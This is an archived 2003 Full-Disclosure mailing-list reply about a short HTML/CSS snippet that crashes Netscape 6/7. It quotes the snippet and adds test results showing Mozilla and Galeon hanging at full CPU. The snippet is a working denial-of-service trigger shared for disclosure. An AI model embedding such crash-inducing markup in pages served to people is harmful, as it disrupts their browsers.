[Full-Disclosure] Re: Netscape 6/7 crashes by a simple stylesheet...

• Previous message: SChoe: "[Full-Disclosure] RE: Multiple Vendor FTP pipe Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: full-disclosure@lists.netsys.com
From: Raj Mathur <raju@linux-delhi.org>
Date: Wed, 26 Feb 2003 09:13:30 +0530

>>>>> "Jocke" == jux <jux@beer.com> writes:

    Jocke> Hi, I'm new here so I don't know if I posted this in the
    Jocke> correct list...

    Jocke> I've found out that some simple CSS-code can crash Netscape
    Jocke> 6 and 7.

    Jocke> This is a simple html-page containing this code:

    Jocke> <html> <body> <div style="position:absolute;">

    Jocke> <div style="position:absolute; overflow:scroll">
 
    Jocke> </div> </div> </body> </html>

    Jocke> Was this already known?

Tested on following browsers on Red Hat Linux 8.0, i386:

galeon-1.2.6-0.8.0: Consumes 100% CPU but continues to respond to
events.

kdebase-3.0.3-14 (Konqueror): No effect

mozilla-1.0.1-26: Consumes 100% CPU, stops responding to events (or
takes overly long to respond -- I didn't wait more than a couple of
minutes).

netscape-communicator-4.79-1: No effect.

Regards,

-- Raju

    Jocke> /Jocke

-- 
Raj Mathur                raju@kandalaya.org      http://kandalaya.org/
                      It is the mind that moves
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

• Next message: Jakob Balle: "[Full-Disclosure] Secunia Research: Opera browser Cross Site Scripting"
• Previous message: SChoe: "[Full-Disclosure] RE: Multiple Vendor FTP pipe Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]